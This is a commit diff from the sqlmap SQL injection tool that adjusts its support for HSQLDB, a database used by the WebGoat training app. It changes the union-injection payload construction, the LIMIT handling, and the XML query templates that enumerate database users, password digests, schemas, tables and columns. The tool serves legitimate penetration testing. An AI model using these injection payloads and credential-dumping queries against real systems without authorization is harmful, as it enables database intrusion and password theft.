mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 11:03:47 +03:00
Further fixes for sqlmap to work properly with HSQLDB (WebGoat)
This commit is contained in:
Miroslav Stampar
parent
48619d9ae1
commit
570562369b
|
|
@ -588,7 +588,7 @@ class Agent(object):
|
||||||
else:
|
else:
|
||||||
return query
|
return query
|
||||||
|
|
||||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL,):
|
if Backend.isDbms(DBMS.MYSQL):
|
||||||
if fieldsExists:
|
if fieldsExists:
|
||||||
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.chars.start, 1)
|
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.chars.start, 1)
|
||||||
concatenatedQuery += ",'%s')" % kb.chars.stop
|
concatenatedQuery += ",'%s')" % kb.chars.stop
|
||||||
|
|
@ -615,6 +615,7 @@ class Agent(object):
|
||||||
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
||||||
_ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM "))
|
_ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM "))
|
||||||
concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:])
|
concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:])
|
||||||
|
concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), "\g<2>\g<1>\g<3>", concatenatedQuery)
|
||||||
elif fieldsSelect:
|
elif fieldsSelect:
|
||||||
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
||||||
concatenatedQuery += "||'%s'" % kb.chars.stop
|
concatenatedQuery += "||'%s'" % kb.chars.stop
|
||||||
|
|
@ -885,16 +886,30 @@ class Agent(object):
|
||||||
fromIndex = limitedQuery.index(" FROM ")
|
fromIndex = limitedQuery.index(" FROM ")
|
||||||
untilFrom = limitedQuery[:fromIndex]
|
untilFrom = limitedQuery[:fromIndex]
|
||||||
fromFrom = limitedQuery[fromIndex + 1:]
|
fromFrom = limitedQuery[fromIndex + 1:]
|
||||||
orderBy = False
|
orderBy = None
|
||||||
|
|
||||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE):
|
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE):
|
||||||
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
|
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
|
||||||
limitedQuery += " %s" % limitStr
|
limitedQuery += " %s" % limitStr
|
||||||
|
|
||||||
elif Backend.isDbms(DBMS.HSQLDB):
|
elif Backend.isDbms(DBMS.HSQLDB):
|
||||||
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num)
|
match = re.search(r"ORDER BY [^ ]+", limitedQuery)
|
||||||
|
if match:
|
||||||
|
limitedQuery = re.sub(r"\s*%s\s*" % match.group(0), " ", limitedQuery).strip()
|
||||||
|
limitedQuery += " %s" % match.group(0)
|
||||||
|
|
||||||
|
if query.startswith("SELECT "):
|
||||||
|
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
|
||||||
|
limitedQuery = limitedQuery.replace("SELECT ", "SELECT %s " % limitStr, 1)
|
||||||
|
else:
|
||||||
|
limitStr = queries[Backend.getIdentifiedDbms()].limit.query2 % (1, num)
|
||||||
limitedQuery += " %s" % limitStr
|
limitedQuery += " %s" % limitStr
|
||||||
|
|
||||||
|
if not match:
|
||||||
|
match = re.search(r"%s\s+(\w+)" % re.escape(limitStr), limitedQuery)
|
||||||
|
if match:
|
||||||
|
orderBy = " ORDER BY %s" % match.group(1)
|
||||||
|
|
||||||
elif Backend.isDbms(DBMS.FIREBIRD):
|
elif Backend.isDbms(DBMS.FIREBIRD):
|
||||||
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, num + 1)
|
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, num + 1)
|
||||||
limitedQuery += " %s" % limitStr
|
limitedQuery += " %s" % limitStr
|
||||||
|
|
|
||||||
|
|
@ -165,12 +165,16 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
|
||||||
# Unbiased approach for searching appropriate usable column
|
# Unbiased approach for searching appropriate usable column
|
||||||
random.shuffle(positions)
|
random.shuffle(positions)
|
||||||
|
|
||||||
|
for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS):
|
||||||
|
if vector:
|
||||||
|
break
|
||||||
|
|
||||||
# For each column of the table (# of NULL) perform a request using
|
# For each column of the table (# of NULL) perform a request using
|
||||||
# the UNION ALL SELECT statement to test it the target URL is
|
# the UNION ALL SELECT statement to test it the target URL is
|
||||||
# affected by an exploitable union SQL injection vulnerability
|
# affected by an exploitable union SQL injection vulnerability
|
||||||
for position in positions:
|
for position in positions:
|
||||||
# Prepare expression with delimiters
|
# Prepare expression with delimiters
|
||||||
randQuery = randomStr(UNION_MIN_RESPONSE_CHARS)
|
randQuery = randomStr(charCount)
|
||||||
phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop)
|
phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop)
|
||||||
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
|
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
|
||||||
randQueryUnescaped = unescaper.escape(randQueryProcessed)
|
randQueryUnescaped = unescaper.escape(randQueryProcessed)
|
||||||
|
|
@ -192,7 +196,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
|
||||||
|
|
||||||
if where == PAYLOAD.WHERE.ORIGINAL:
|
if where == PAYLOAD.WHERE.ORIGINAL:
|
||||||
# Prepare expression with delimiters
|
# Prepare expression with delimiters
|
||||||
randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS)
|
randQuery2 = randomStr(charCount)
|
||||||
phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop)
|
phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop)
|
||||||
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
|
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
|
||||||
randQueryUnescaped2 = unescaper.escape(randQueryProcessed2)
|
randQueryUnescaped2 = unescaper.escape(randQueryProcessed2)
|
||||||
|
|
|
||||||
|
|
@ -415,7 +415,7 @@ class Databases:
|
||||||
colList = filter(None, colList)
|
colList = filter(None, colList)
|
||||||
|
|
||||||
if conf.tbl:
|
if conf.tbl:
|
||||||
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB):
|
||||||
conf.tbl = conf.tbl.upper()
|
conf.tbl = conf.tbl.upper()
|
||||||
|
|
||||||
tblList = conf.tbl.split(",")
|
tblList = conf.tbl.split(",")
|
||||||
|
|
|
||||||
|
|
@ -651,8 +651,8 @@
|
||||||
<cast query="CAST(%s AS LONGVARCHAR)"/>
|
<cast query="CAST(%s AS LONGVARCHAR)"/>
|
||||||
<length query="CHAR_LENGTH(%s)"/>
|
<length query="CHAR_LENGTH(%s)"/>
|
||||||
<isnull query="IFNULL(%s,' ')"/>
|
<isnull query="IFNULL(%s,' ')"/>
|
||||||
<delimiter query=","/>
|
<delimiter query="||"/>
|
||||||
<limit query="LIMIT %d OFFSET %d"/>
|
<limit query="LIMIT %d %d" query2="LIMIT %d OFFSET %d"/>
|
||||||
<limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
|
<limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
|
||||||
<limitgroupstart query="1"/>
|
<limitgroupstart query="1"/>
|
||||||
<limitgroupstop query="2"/>
|
<limitgroupstop query="2"/>
|
||||||
|
|
@ -676,26 +676,26 @@
|
||||||
<users>
|
<users>
|
||||||
<!-- LIMIT is needed at start for v1.7 this gets mangled unless no-cast is used -->
|
<!-- LIMIT is needed at start for v1.7 this gets mangled unless no-cast is used -->
|
||||||
<blind query="SELECT LIMIT %d 1 DISTINCT(user) FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user" count="SELECT COUNT(DISTINCT(user)) FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
|
<blind query="SELECT LIMIT %d 1 DISTINCT(user) FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user" count="SELECT COUNT(DISTINCT(user)) FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
|
||||||
<inband query="SELECT user FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
|
<inband query="SELECT user FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user"/>
|
||||||
</users>
|
</users>
|
||||||
<passwords>
|
<passwords>
|
||||||
<!-- Passwords only shown in later versions >=2.0 -->
|
<!-- Passwords only shown in later versions >=2.0 -->
|
||||||
<blind query="SELECT LIMIT %d 1 DISTINCT(password_digest) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s' ORDER BY password_digest" count="SELECT COUNT(DISTINCT(password_digest)) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'"/>
|
<blind query="SELECT LIMIT %d 1 DISTINCT(password_digest) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s' ORDER BY password_digest" count="SELECT COUNT(DISTINCT(password_digest)) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'"/>
|
||||||
<inband query="SELECT user_name,password_digest FROM INFORMATION_SCHEMA.SYSTEM_USERS" condition="user_name"/>
|
<inband query="SELECT user_name,password_digest FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user_name" condition="user_name"/>
|
||||||
</passwords>
|
</passwords>
|
||||||
<privileges/>
|
<privileges/>
|
||||||
<roles/>
|
<roles/>
|
||||||
<dbs>
|
<dbs>
|
||||||
<blind query="SELECT LIMIT %d 1 DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS ORDER BY table_schem" count="SELECT COUNT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS"/>
|
<blind query="SELECT LIMIT %d 1 DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS ORDER BY table_schem" count="SELECT COUNT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS"/>
|
||||||
<inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" />
|
<inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS ORDER BY table_schem" />
|
||||||
</dbs>
|
</dbs>
|
||||||
<tables>
|
<tables>
|
||||||
<blind query="SELECT LIMIT %d 1 table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s' ORDER BY table_name" count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'"/>
|
<blind query="SELECT LIMIT %d 1 table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s' ORDER BY table_name" count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'"/>
|
||||||
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES" condition="table_schem"/>
|
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES ORDER BY table_schem" condition="table_schem"/>
|
||||||
</tables>
|
</tables>
|
||||||
<columns>
|
<columns>
|
||||||
<blind query="SELECT column_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s' ORDER BY column_name" query2="SELECT column_type FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schem='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" condition="column_name"/>
|
<blind query="SELECT column_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s' ORDER BY column_name" query2="SELECT column_type FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schem='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" condition="column_name"/>
|
||||||
<inband query="SELECT column_name,type_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" condition="column_name"/>
|
<inband query="SELECT column_name,type_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s' ORDER BY column_name" condition="column_name"/>
|
||||||
</columns>
|
</columns>
|
||||||
<dump_table>
|
<dump_table>
|
||||||
<blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT 1 OFFSET %d" count="SELECT COUNT(*) FROM %s.%s"/>
|
<blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT 1 OFFSET %d" count="SELECT COUNT(*) FROM %s.%s"/>
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue
Block a user